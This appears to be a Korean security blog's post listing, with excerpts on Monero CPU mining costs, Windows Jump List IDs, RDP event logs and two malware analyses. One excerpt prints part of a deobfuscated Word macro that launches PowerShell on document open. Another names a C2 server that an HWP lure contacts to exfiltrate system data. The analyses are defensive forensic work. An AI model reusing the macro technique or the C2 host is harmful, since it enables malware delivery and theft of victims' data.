728x90 반응형 전체 글69 모네로(XMR) 채굴 방법 모네로가 랜덤X로 하드포크되면서 기존 방식인 그래픽카드 채굴이 아닌 CPU로만 가능 2022. 10. 5. 기준 모네로 시세 20만 8천원으로 계산 전기세는 일반용전기 연평균인 1KWh당 110원 본체 소비전력은 100W로 계산 마풀러 1등 채굴가 : 해시 값 2264265 / 모네로 0.496 기준 CPU HASH XMR KRW 소비전력 비용 i7 6700 2012 0.00891863 1773 72 7920 i5 3550 1250 0.00553651 1100 72 7920 i3 3250 425 0.00188291 370 72 7920 CPU에 관한 채산성은 아래 링크로 확인 https://www.betterhash.net/AMD-Ryzen-9-3900X-12-Core-Processor-mining-.. 2022. 10. 5. 악성코드가 포함된 워드문서(doc) 분석 ○ 워드 문서를 열람하면 매크로 기능이 포함되어 있는 문서로 확인된다. ○ 매크로 내용을 확인한 결과, 난독화된 소스코드가 확인되며 디코딩하면 아래 표와 같다. Public Sub Document_Open() Set a = CreateObject("Shell.Application") Dim d f = "vnslajdsladkf" f = Left(f, 5) #vnsla 문자열 추출 d = "pvnslavnslaowvnslavnslavnslaersvnslahelvnslavnslal.evnslaxvnslae" d = Replace(d, f, "") # d 변수 문자열에서 “vnsla”을 공백으로 변경 # d = "powershell.exe" h = "[vnslastvnslarivnslanvnslag]$vnsl.. 2022. 10. 3. 윈도우 점프리스트(Windows Jump List) 0006f647f9488d7a|AIM 7.5.11.9 (custom AppID + JL support) 00098b0ef1c84088|fulDC 6.78 012dc1ea8e34b5a6|Microsoft Paint 6.1 01b29f0dc90366bb|AIM 5.9.3857 b08971c77377bde3|Visual Studio Enterprise 2015 Version 14.0 Update 3 c31b3d36438b5e2c|Visual Studio Enterprise 2017 Version 15.9.10 03d877ec11607fe4|Thunderbird 6.0.2 044a50e6c87bc012|Classic FTP Plus 2.15 a2b95ca27b6c33d9|Windows Live Photo Gal.. 2022. 10. 2. lnk 악성코드가 포함된 한글 (hwp) 문서파일 분석 ○ 한글문서를 실행하면 아래 그림과 같은 그림파일의 포스터 4장이 존재한다. 포스터 뒤에는 실행링크(1.lnk, 2.lnk, 3.lnk)가 포함되어 있는 것이 확인된다. ○ 사용자가 문서 내 그림을 클릭하면 링크파일이 실행되며 아래 그림과 같이 ‘bongpenn1.myartsonline.com’ C2서버와 통신하는 것이 확인된다. ‘1.exe’를 이용하여 C2서버의 ‘h.php’ 소스코드를 실행하며 ‘h.php’ 소스코드를 확인한 결과, 작업스케줄러에 'update.ini', 'OndDrive.exe' 파일이 30분마다 자동실행되도록 등록하고 최근 실행파일, 작업스케줄러 목록, 프로그램 목록 등을 C2서버로 전송하는 소스코드를 확인하였다. 한글문서 내에서 악성행위를 하는 OLE 개체를 확인한 결과, 아래.. 2022. 10. 2. 원격접속 시 이벤트 로그의 변화 (Event ID 1149 261) TerminalServices-RemoteConnectionMnager Event ID : 1149 설명 : 사용자 인증 성공 이 이벤트는 로그인에 성공한 것이 아님. 원격에서 사용자가 RDP연결을 시도하고 연결에 성공하여 로그인창이 떴을때 나오는 이벤트임. ex) mstsc > IP입력 > 로그인창 TerminalServices-LocalSesstionManager Event ID : 25 설명 : 세션 재연결 성공 출발지 IP에서 세션을 재연결하는데 성공함. 로그인 성공 ======================================================================================== [RDP Brute Force 공격 도구 사용하여 로그인 성공시 이벤트 로.. 2022. 10. 1. 애니데스크 접속 기록 (Anydesk log) 보호되어 있는 글 입니다. 2022. 10. 1. 이전 1 ··· 8 9 10 11 12 다음 728x90 반응형
